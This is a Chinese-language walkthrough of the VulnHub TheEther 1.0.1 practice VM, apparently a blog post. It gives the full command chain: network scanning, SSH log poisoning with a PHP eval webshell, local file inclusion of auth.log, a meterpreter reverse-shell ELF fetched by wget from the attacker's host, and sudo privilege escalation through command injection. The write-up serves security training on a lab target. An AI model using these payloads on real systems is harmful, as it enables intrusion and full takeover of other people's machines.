Vulhub TheEther_1.0.1靶机详解

项目地址

plain 复制代码
https://download.vulnhub.com/theether/theEther_1.0.1.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

plain 复制代码
nmap 192.168.47.1-254

根据对比可知theEther的一个ip地址为192.168.47.164

扫描Zico 2的操作系统,端口及对应服务

plain 复制代码
nmap -A -p- 192.168.47.164

发现开放22,80端口

目录扫描

plain 复制代码
dirb http://192.168.47.164

访问网站获取敏感信息

在About us这里疑似存在文件包含漏洞

由敏感信息可知其服务器中间件是apache,文件包含可通过日志文件包含获权

尝试拼接默认目录 -> /var/log/auth.log路径无法访问,存在报错

尝试利用ssh登录报错注入进错误访问日志中

plain 复制代码
ssh "<?php eval($_GET[cmd]);?>"@192.168.47.164

尝试burp抓包,查看数据包信息

发送到Repeater模块,拼接日志路径

获取shell

拼接命令

plain 复制代码
&d1no

打开kali,利用msf生成shell -> 同时打开msf的内部监听

plain 复制代码
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.47.129 LPORT=4444 -f elf > shell.elf
plain 复制代码
msfconsole
 
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.47.129
set lport 7272

新启一个http临时服务,让靶机远程下载shell.elf文件

plain 复制代码
python -m http.server 2429
plain 复制代码
/?file=/var/log/auth.log&d1no=system('wget+192.168.47.129:2429/shell.elf');
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf');
/?file=/var/log/auth.log&d1no=system('./shell.elf');

监听成功

提权

获得可交互式shell

plain 复制代码
shell
python -c 'import pty;pty.spawn("/bin/bash")'

查看可利用提权

plain 复制代码
sudo -l
plain 复制代码
sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

提权成功

相关推荐
jingshaoyou7 小时前
【11】Strongswan processor 详解1
网络·网络安全
拾柒SHY8 小时前
WEB安全-CTF中的PHP反序列化漏洞
web安全·网络安全
白猫a٩9 小时前
记一次某网络安全比赛三阶段webserver应急响应解题过程
安全·web安全·网络安全
浩浩测试一下16 小时前
网络安全中信息收集需要收集哪些信息了?汇总
安全·web安全·网络安全·oracle·sqlite·系统安全·可信计算技术
一口一个橘子18 小时前
[ctfshow web入门] web40
前端·web安全·网络安全
Alfadi联盟 萧瑶19 小时前
文件上传、读取与包含漏洞解析及防御实战
网络安全
网络安全工程师老王21 小时前
clickhouse注入手法总结
数据库·clickhouse·web安全·网络安全·信息安全
曼岛_1 天前
【零基础实战】Ubuntu搭建DVWA漏洞靶场全流程详解(附渗透测试示例)
ubuntu·网络安全·黑客
Factor安全1 天前
CVE-2025-24813 漏洞全解析|Apache Tomcat 关键路径绕过与RCE
安全·web安全·网络安全·tomcat·apache·安全威胁分析·安全性测试
QT.qtqtqtqtqt1 天前
网络安全防护技术
安全·网络安全·防火墙·vpn·入侵检测·网闸